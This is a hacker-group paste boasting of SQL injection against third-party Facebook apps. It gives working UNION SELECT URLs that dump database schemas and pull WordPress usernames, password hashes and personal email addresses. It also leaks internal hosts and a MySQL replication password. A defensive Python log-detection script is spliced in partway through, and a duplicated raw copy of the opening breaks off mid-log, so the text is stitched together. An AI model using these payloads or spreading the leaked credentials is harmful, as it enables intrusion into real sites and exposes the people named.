
Facebook server data leaked by alpha zone


   
        English translation
   
            AlpHa zONE
   
             data leak by cybxr :D and LEgit Hacker
   
   
    [0x00] [Introduction]
    [0x01] [First impressions]
    [0x02] [Search for bugs]
    [0x03] [Crash Exploit]
    [0x04] [Conclusion]
    [0x05] [Greetz]
   
   
   
   
   
   
       __             __      __  
     /'__`\         /'__`\  /'__`\
    /\ \/\ \  __  _/\ \/\ \/\ \/\ \
    \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
     \ \ \_\ \/>  </\ \ \_\ \ \ \_\ \
      \ \____//\_/\_\\ \____/\ \____/
       \/___/ \//\/_/ \/___/  \/___/
              [Introduction]
   
   
   
   
    + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important
    parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
   
    We did not change the main page, did not sell a backup of the server and did not delete files.
   
    We have demonstrated the flaw in the system. Start =] ..
   
   
   
       __             __      _  
     /'__`\         /'__`\  /' \  
    /\ \/\ \  __  _/\ \/\ \/\_, \
    \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
     \ \ \_\ \/>  </\ \ \_\ \ \ \ \
      \ \____//\_/\_\\ \____/  \ \_\
       \/___/ \//\/_/ \/___/    \/_/
            [First impressions]
   
   
   
   
    At first glance, Facebook is a well-protected social network.
    Scanning the Facebook server did not turn up anything interesting ... )
   
    ..>
   
    Initiating Parallel DNS resolution of 1 host.
    Completed Parallel DNS resolution of 1 host.
    Initiating SYN Stealth Scan
    Scanning facebook.com (69.63.181.11) [1000 ports]
    Discovered open port 443/tcp on 69.63.181.11
    Discovered open port 80/tcp on 69.63.181.11
    Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
    Initiating Service scan
    Scanning 2 services on facebook.com (69.63.181.11)
    Service scan Timing: About 50.00% done; ETC:
    Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
    NSE: Script scanning 69.63.181.11.
    NSE: Starting runlevel 1 (of 1) scan.
    Initiating NSE at 22:41
    Completed NSE at 22:41, 0.38s elapsed
    NSE: Script Scanning completed.
    Nmap scan report for facebook.com (69.63.181.11)
    Host is up (0.17s latency).
    Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
    rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
    Not shown: 998 filtered ports
    PORT    STATE SERVICE   VERSION
    80/tcp  open  http
    443/tcp open  ssl/https
   
   
    go ahead .. =]
   
   
       __             __      ___  
     /'__`\         /'__`\  /'___`\
    /\ \/\ \  __  _/\ \/\ \/\_\ /\ \
    \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
     \ \ \_\ \/>  </\ \ \_\ \ // /_\ \
      \ \____//\_/\_\\ \____//\______/
       \/___/ \//\/_/ \/___/ \/_____/
             [Search for bugs]
   
   
   
    We use GoOgle.com
   
    request: Facebook+Vulnerability [search]
   
    We see a lot of different bugs / exploits / etc ... Mostly we see only XSS vulnerabilities

    All vulnerabilities are closed (nothing works ... Let us go once again to GoOgle.com
   
    request: site:facebook.com WARNING error
   
    =\ fuck...
        Let us not lose heart) Hackers are not looking for easy ways
   
   
    Visit Facebook.com
   
    Let us search bugs in Web Apps.
   
    http://www.facebook.com/robots.txt
   
   
    oooooooooooooooooooooooooooo
    User-agent: *
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php
   
    User-agent: Slurp
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php
   
    User-agent: msnbot
    Disallow: /ac.php
    Disallow: /ae.php
    Disallow: /album.php
    Disallow: /ap.php
    Disallow: /feeds/
    Disallow: /p.php
    Disallow: /photo.php
    Disallow: /photo_comments.php
    Disallow: /photo_search.php
    Disallow: /photos.php
   
    # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
    Sitemap: http://www.facebook.com/sitemap.php
    00000000000000000000000000000000
   
    nothing interesting =\
   
    http://apps.facebook.com/tvshowchat/
   
    I looked closely and noticed links

    http://apps.facebook.com/tvshowchat/show.php?id=1 It is a habit to check the variable for vulnerability...
   
    check:
   
    http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
   
   
    ooooooooooooooooooooooooooo
   
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
   
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
   
    and other....
   
    oooooooooooooooooooooooooooo
   
   
    O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
   
    Writing exploits, I got the following:
      http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
   
   
    ooooooooooooooooooooooooooo
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    5.0.45-log <= ALERT!!!
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
   
    and other....
   
    oooooooooooooooooooooooooooo
   
   
    Database : adminclt_testsite
    Database User : adminclt_13@209.68.2.10
    MySQL Version : 5.0.67-log
   
   
    super = ] Now we can just say that there is an SQL Injection Vulnerability
   
    http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
   
    Now we know that there is MySql 5.0.45-log
   
    Then let's write another exploit to display tables with information_schema.tables:
   
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
   
   
    oooooooooooooooooooooooooooo
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
   
    Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
   
    201 <= ALERT!!! 201 tables!
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
   
    and other....
   
    oooooooooooooooooooooooooooo
   
    http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
   
    Database : adminclt_testsite
    Database User : adminclt_13@209.68.2.10
    MySQL Version : 5.0.67-log
   
   
    1) AdCode
    2) AdTrack
    3) Admin_DataStore
    4) Admin_User
    5) Challenges
    6) ChallengesCompleted
    7) Comments
    8) ContactEmails
    9) Content
    10) ContentImages
    11) FeaturedTemplate
    12) FeaturedWidgets
    13) Feeds
    14) FolderLinks
    15) Folders
    16) ForumTopics
    17) Log
    18) LogDumps
    19) Newswire
    20) NotificationMessages
    21) Notifications
    22) Orders
    23) OutboundMessages
    24) Photos
    25) Prizes
    26) RawExtLinks
    27) RawSessions
    28) SessionLengths
    29) Sites
    30) Subscriptions
    31) SurveyMonkeys
    32) SystemStatus
    33) Templates
    34) User
    35) UserBlogs
    36) UserCollectives
    37) UserInfo
    38) UserInvites
    39) Videos
    40) WeeklyScores
    41) Widgets
    42) cronJobs
    43) fbSessions
   
    Admin_User
   
    1) id
    2) name
    3) email
    4) password
    5) userid
    6) ncUid
    7) level
   
    User
   
    1) userid
    2) ncUid
    3) name
    4) email
    5) isAdmin
    6) isBlocked
    7) votePower
    8) remoteStatus
    9) isMember
    10) isModerator
    11) isSponsor
    12) isEmailVerified
    13) isResearcher
    14) acceptRules
    15) optInStudy
    16) optInEmail
    17) optInProfile
    18) optInFeed
    19) optInSMS
    20) dateRegistered
    21) eligibility
    22) cachedPointTotal
    23) cachedPointsEarned
    24) cachedPointsEarnedThisWeek
    25) cachedPointsEarnedLastWeek
    26) cachedStoriesPosted
    27) cachedCommentsPosted
    28) userLevel
   
    http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
   
    Current Database : signalpa_fbmFundRraise
    Database User : signalpa_rockaja@localhost
    MySQL Version : 5.0.85-community
   
    DATABASE
    1) information_schema
    2) signalpa_CelebrityPuzzle
    3) signalpa_EBF
    4) signalpa_appNotification
    5) signalpa_appnetwork
    6) signalpa_dailyscriptures
    7) signalpa_ebayfeed
    8) signalpa_fbmFundRraise
    9) signalpa_fbmFundRraisebeta
    10) signalpa_netcards
    11) signalpa_paypal
    12) signalpa_thepuzzle
   
    signalpa_fbmFundRraise
    1) Campaigns
    2) Campaigns_Temp
    3) FB_theme
    4) IfundDollars
    5) Languages
    6) Payments
    7) Paymentsoops
    8) Supporters
    9) Users
    10) Withdrawals
    11) invites
    12) invites_copy
    13) mp_passwords
    14) payment_codes
    15) txt_codes
    16) valid_servers
    17) weeklyBonus
   
        Column: Users
   
   
    1) id
    2) name
    3) email
    4) mobile_no
    5) address
    6) country
    7) password
    8) organisation
    9) date_created
    10) date_updated
    11) status
    12) facebook_id
    13) isFacebookFan
    14) verify
    15) paypalUse
    16) paypalEmail
    17) bacUse
    18) bacAcc
    19) bacName
    20) bacLocation
    21) bacCountry
    22) bacIBAN
    23) bacSort_code
    24) current_rank
    25) new_rank
    26) cronjob
    27) max_fundraise
   
        Column: mp_passwords
   
    1) id
    2) password
    3) username
    4) status
    5) number
    6) rc
    7) referer
    8) transID
    9) currency
    10) transType
    11) amount
    12) confirmed
    13) date
   
    signalpa_paypal
    1) paypal_cart_info
    2) paypal_payment_info
    3) paypal_subscription_info
   
    Column: paypal_cart_info
    1) txnid
    2) itemname
    3) itemnumber
    4) os0
    5) on0
    6) os1
    7) on1
    8) quantity
    9) invoice
    10) custom
   
        Column : paypal_payment_info
   
    1) firstname
    2) lastname
    3) buyer_email
    4) street
    5) city
    6) state
    7) zipcode
    8) memo
    9) itemname
    10) itemnumber
    11) os0
    12) on0
    13) os1
    14) on1
    15) quantity
    16) paymentdate
    17) paymenttype
    18) txnid
    19) mc_gross
    20) mc_fee
    21) paymentstatus
    22) pendingreason
    23) txntype
    24) tax
    25) mc_currency
    26) reasoncode
    27) custom
    28) country
    29) datecreation
   
   
    http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
   
   
    Current Database : tv
    Database User : tomkincaid@ps5008.dreamhost.com
    MySQL Version : 5.0.45-log
   
        DATABASES
   
   
    1) information_schema
    2) astro
    3) candukincaid
    4) cemeteries
    5) churchwpdb
    6) countdownapp
    7) crush
    8) dare
    9) friendiq
    10) giants
    11) hookup
    12) jauntlet
    13) loccus
    14) luciacanduwp
    15) maps
    16) martisor
    17) mediax
    18) mostlikely
    19) music
    20) pimpfriends
    21) plans
    22) politicsapp
    23) postergifts
    24) posters2
    25) projectbasecamp
    26) pwnfriends
    27) quiz
    28) seeall
    29) send
    30) supporter
    31) swapu
    32) tomsapps
    33) travelbug
   
        tab.send
   
   
    1) app
    2) item
    3) itemforuser
    4) neverblue
    5) user
   
        Columns
   
    user(12454)
   
    1) userid
    2) siteid
    3) appkey
    4) session
    5) points
    6) added
    7) removed
   
    Tab. candukincaid
   
    1) wp_comments
    2) wp_links
    3) wp_options
    4) wp_post****
    5) wp_posts
    6) wp_px_albumPhotos
    7) wp_px_albums
    8) wp_px_galleries
    9) wp_px_photos
    10) wp_px_plugins
    11) wp_term_relationships
    12) wp_term_taxonomy
    13) wp_terms
    14) wp_user****
    15) wp_users
   
   
        Column wp_users
   
   
    1) ID
    2) user_login
    3) user_pass
    4) user_nicename
    5) user_email
    6) user_url
    7) user_registered
    8) user_activation_key
    9) user_status
    10) display_name
   
    etc...
   
    http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]
   
    > ~ inj3ct0r_facebook_exploit [ENTER]
   
   
    http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]
   
    Database: affinispac_fb
    User: affinispac_fb@localhost
    Version: 5.0.67-community
   
    http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]
   
    >plucky@localhost : facebook : 4.0.13-log
   
    etc... =]
   
   
    Next xD
   
    Database: thetvdb
     User: thetvdb@localhost
     Version: 5.0.51a-24-log
   
   
    [Database]: thetvdb
   
   
    [1]aka_seriesname
    [2]apiusers
    [3]banners
    [4]deletions
    [5]genres
    [6]imgstatus
    [7]languages
    [8]mirrors
    [9]networks
    [10]ratings
    [11]runtimes
    [12]seriesactors
    [13]seriesupdates
    [14]translation_episodename
    [15]translation_episodeoverview
    [16]translation_labels
    [17]translation_seriesname
    [18]translation_seriesoverview
    [19]tvepisodes
    [20]tvseasons
    [21]tvseries
    [22]user_episodes
    [23]users
   
    users:
   
       id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
       favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
       lastupdatedby_admin,mirrorupdate
   
   
    [userpass]
   
   
    [Database]: wiki
   
   
    [24]archive
    [25]categorylinks
    [26]externallinks
    [27]filearchive
    [28]hitcounter
    [29]image
    [30]imagelinks
    [31]interwiki
    [32]ipblocks
    [33]job
    [34]langlinks
    [35]logging
    [36]math
    [37]objectcache
    [38]oldimage
    [39]page
    [40]page_restrictions
    [41]pagelinks
    [42]querycache
    [43]querycache_info
    [44]querycachetwo
    [45]recentchanges
    [46]redirect
    [47]revision
    [48]searchindex
    [49]site_stats
    [50]templatelinks
    [51]text
    [52]trackbacks
    [53]transcache
    [54]user
    [55]user_groups
    [56]user_newtalk
    [57]watchlist
   
    user:
   
      user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
      user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
      user_email_token_expires,user_registration,user_editcount
   
    ['user_name'] : ['user_pass']
   
   
   
    ---------------------------------------------------------------------------------------------------------------------------------------------------
   
    read /etc/hosts
   
    127.0.0.1 localhost localhost.localdomain
    192.168.1.167 140696-db2.flufffriends.com 140696-db2
    192.168.1.166 140695-db1.flufffriends.com 140695-db1
    192.168.1.165 140694-web2.flufffriends.com 140694-web2
    192.168.1.164 140693-web1.flufffriends.com 140693-web1
    69.63.176.141 api.facebook.com
    208.116.17.80 peanutlabs.com
   
    ----------------------------------
   
    /etc/my.cnf
   
    #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
   
    log-bin=/var/lib/mysqllogs/bin-log
   
    binlog-do-db=fluff2
   
    expire-logs-days=14
   
   
   
    server-id = 5
   
   
   
    #master-host=69.63.176.141
   
    #master-user=romis_user
   
    #master-password=romis0123
   
    #master-connect-retry=60
   
    replicate-do-db=miserman
   
   
    #log-slave-updates
   
    expire_logs_days = 14
   
   
    I think we found a sufficient number of vulnerabilities!
   
    ---------------------------
   
       __             __      __  
     /'__`\         /'__`\  /'__`\
    /\ \/\ \  __  _/\ \/\ \/\_\L\ \
    \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
     \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
      \ \____//\_/\_\\ \____/\ \____/
       \/___/ \//\/_/ \/___/  \/___/
     
   
   
   
    So .. Moving on to the fun, friends

    To avoid vandalism by script kiddies I will not give you a link to shell.php, but I enclose images and some interesting queries =]
   
    ..> Exploit start . + . + . + . + . + . + .
   
    wp_posts
   
    post_password
   
    wp_users
   
    user_pass
   
    done.....
   
   
    WordPress! oO one of the modules installed in facebook is Wordpress!
   
   
    check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
   
   
    oooooooooooooooooooooooooooo
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
   
    Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
   
    3 <= ALERT! Users! =]
   
    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
   
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
   
    oooooooooooooooooooooooooooo
   
    ..> Crach_exploit [ENTER]
   
    user:
   
    admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
    lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
    tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
   
    cracker:
   
    admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
    lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
    tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.   :tom:tom_kincaid@hotmail.com
   
    see request:
   
   
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
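Seen from the defender's side, every request in this write-up puts non-numeric text into a parameter that should only ever hold an integer, so the whole sequence is visible in a web access log. The detection sketch below is an added example, not part of the original paste: the log lines are constructed (documentation IP ranges, a `/tv/show.php` path), and treating `id`, `cid`, `areaid` and `user_id` as integer-only is an assumption drawn from the URLs shown on this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters (taken from the URLs in the write-up) are
# integer keys and never legitimately carry anything but ASCII digits.
NUMERIC_PARAMS = {"id", "cid", "areaid", "user_id"}

# Signatures run against the URL-decoded, lower-cased parameter value.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.S)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b")),
    ("version-probe", re.compile(r"@@version|\bversion\s*\(")),
    ("qualified-table-read", re.compile(r"\bfrom\s+\w+\.\w+")),
    ("comment-terminator", re.compile(r"--(\s|$)|/\*")),
]

# Request part of an Apache/nginx combined-format access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: one normal request, the probe and injection
# requests described above, and a benign request containing "union".
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /tv/show.php?id=1 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /tv/show.php?id=inj3ct0r HTTP/1.1" 200 901
192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /tv/show.php?id=1+and+1=2+union+select+@@version--+1 HTTP/1.1" 200 1422
192.0.2.44 - - [01/Jan/2024:10:00:15 +0000] "GET /tv/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1 HTTP/1.1" 200 1507
192.0.2.44 - - [01/Jan/2024:10:00:21 +0000] "GET /tv/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1-- HTTP/1.1" 200 1611
198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /tv/show.php?id=42&ref=union+square HTTP/1.1" 200 5001
"""


def classify(name, value):
    """Return the labels raised by one decoded query parameter."""
    labels = []
    if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]{1,10}", value):
        labels.append("non-numeric")
    lowered = value.lower()
    labels += [label for label, rx in SIGNATURES if rx.search(lowered)]
    return labels


def analyze_line(line):
    """Parse one access-log line; return a finding dict or None if clean."""
    m = LOG_RE.match(line)
    if not m:
        return None  # malformed or non-HTTP line: nothing to inspect
    parts = urlsplit(m["target"])
    labels = []
    # parse_qsl decodes both '+' (space) and %XX escapes, so the plain and
    # the percent-encoded variants of a request normalise to the same text.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label in classify(name, value):
            if label not in labels:
                labels.append(label)
    if not labels:
        return None
    return {
        "ip": m["ip"],
        "path": parts.path,
        "status": int(m["status"]),
        "labels": labels,
    }


def by_client(log_text):
    """Aggregate findings per client to show the probe-to-dump progression."""
    clients = {}
    for line in log_text.splitlines():
        finding = analyze_line(line)
        if finding is None:
            continue
        entry = clients.setdefault(finding["ip"], {"requests": 0, "labels": set()})
        entry["requests"] += 1
        entry["labels"].update(finding["labels"])
    return {
        ip: {"requests": e["requests"], "labels": sorted(e["labels"])}
        for ip, e in clients.items()
    }


if __name__ == "__main__":
    for ip, summary in by_client(SAMPLE_LOG).items():
        print(ip, summary["requests"], ", ".join(summary["labels"]))
```

The `non-numeric` label alone already catches the first probe (`id=inj3ct0r`), before any SQL keyword appears in the log.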
   
   
   
    goOd =] Nice Hacking old school xD
   
   
       __             __   __ __    
     /'__`\         /'__`\/\ \\ \  
    /\ \/\ \  __  _/\ \/\ \ \ \\ \  
    \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
     \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
      \ \____//\_/\_\\ \____/\/_/\_\_/
       \/___/ \//\/_/ \/___/    \/_/
               [Conclusion]
   
                                     
   
    There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update!  (Alpha zone Exploit Database)
   
   
   
       __             __   ______  
     /'__`\         /'__`\/\  ___\
    /\ \/\ \  __  _/\ \/\ \ \ \__/
    \ \ \ \ \/\ \/'\ \ \ \ \ \___``\
     \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
      \ \____//\_/\_\\ \____/\ \____/
       \/___/ \//\/_/ \/___/  \/___/
                 [Greetz]
   
   
   
    Greetz all Member Alpha zone
   
   
   
   
   
   
   
    GoOd luck Hackers! =]
   
   
    https://www.facebook.com/AlphaZoneOfficial
    like us ^

create a new version of this paste RAW Paste Data
English translation AlpHa zONE data leak by cybxr :D and LEgit Hacker [0x00] [Introduction] [0x01] [First impressions] [0x02] [Search for bugs] [0x03] [Inj3ct0r Crash Exploit] [0x04] [Conclusion] [0x05] [Greetz] __ __ __ /'__`\ /'__`\ /'__`\ /\ \/\ \ __ _/\ \/\ \/\ \/\ \ \ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \ \ \ \_\ \/> </\ \ \_\ \ \ \_\ \ \ \____//\_/\_\\ \____/\ \____/ \/___/ \//\/_/ \/___/ \/___/ [Introduction] + [En] => In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system. We did not change the main page, do not sell backup server does not delete files. We have demonstrated the flaw in the system. Start =] .. __ __ _ /'__`\ /'__`\ /' \ /\ \/\ \ __ _/\ \/\ \/\_, \ \ \ \ \ \/\ \/'\ \ \ \ \/_/\ \ \ \ \_\ \/> </\ \ \_\ \ \ \ \ \ \____//\_/\_\\ \____/ \ \_\ \/___/ \//\/_/ \/___/ \/_/ [First impressions] At first glance, FaceBook well protected social network. Scanning FaceBook server did not give nothing interesting ... ) ..> Initiating Parallel DNS resolution of 1 host. Completed Parallel DNS resolution of 1 host. Initiating SYN Stealth Scan Scanning facebook.com (69.63.181.11) [1000 ports] Discovered open port 443/tcp on 69.63.181.11 Discovered open port 80/tcp on 69.63.181.11 Completed SYN Stealth Scan 13.16s elapsed (1000 total ports) Initiating Service scan Scanning 2 services on facebook.com (69.63.181.11) Service scan Timing: About 50.00% done; ETC: Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host) NSE: Script scanning 69.63.181.11. NSE: Starting runlevel 1 (of 1) scan. Initiating NSE at 22:41 Completed NSE at 22:41, 0.38s elapsed NSE: Script Scanning completed. Nmap scan report for facebook.com (69.63.181.11) Host is up (0.17s latency). Hostname facebook.com resolves to 4 IPs. 
Only scanned 69.63.181.11 rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http 443/tcp open ssl/https go ahead .. =] __ __ ___ /'__`\ /'__`\ /'___`\ /\ \/\ \ __ _/\ \/\ \/\_\ /\ \ \ \ \ \ \/\ \/'\ \ \ \ \/_/// /__ \ \ \_\ \/> </\ \ \_\ \ // /_\ \ \ \____//\_/\_\\ \____//\______/ \/___/ \//\/_/ \/___/ \/_____/ [Search for bugs] We use GoOgle.com request: Facebook+Vulnerability [search] We see a lot of different bug / exploits / etc ... Most see only XSS Vulnerabilities but all this can be found by searching : http://inj3ct0r.com/search All vulnerabilities are closed (Nothing does not work ... Let us once again to GoOgle.com request: site:facebook.com WARNING error =\ fuck... Let us not lose heart) Hackers are not looking for easy ways Visit Facebook.com Let us search bugs in Web Apps. http://www.facebook.com/robots.txt oooooooooooooooooooooooooooo User-agent: * Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: Slurp Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php User-agent: msnbot Disallow: /ac.php Disallow: /ae.php Disallow: /album.php Disallow: /ap.php Disallow: /feeds/ Disallow: /p.php Disallow: /photo.php Disallow: /photo_comments.php Disallow: /photo_search.php Disallow: /photos.php # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied. Sitemap: http://www.facebook.com/sitemap.php 00000000000000000000000000000000 nothing interesting =\ http://apps.facebook.com/tvshowchat/ I looked closely, I noticed links http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability... 
check: http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r

ooooooooooooooooooooooooooo
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
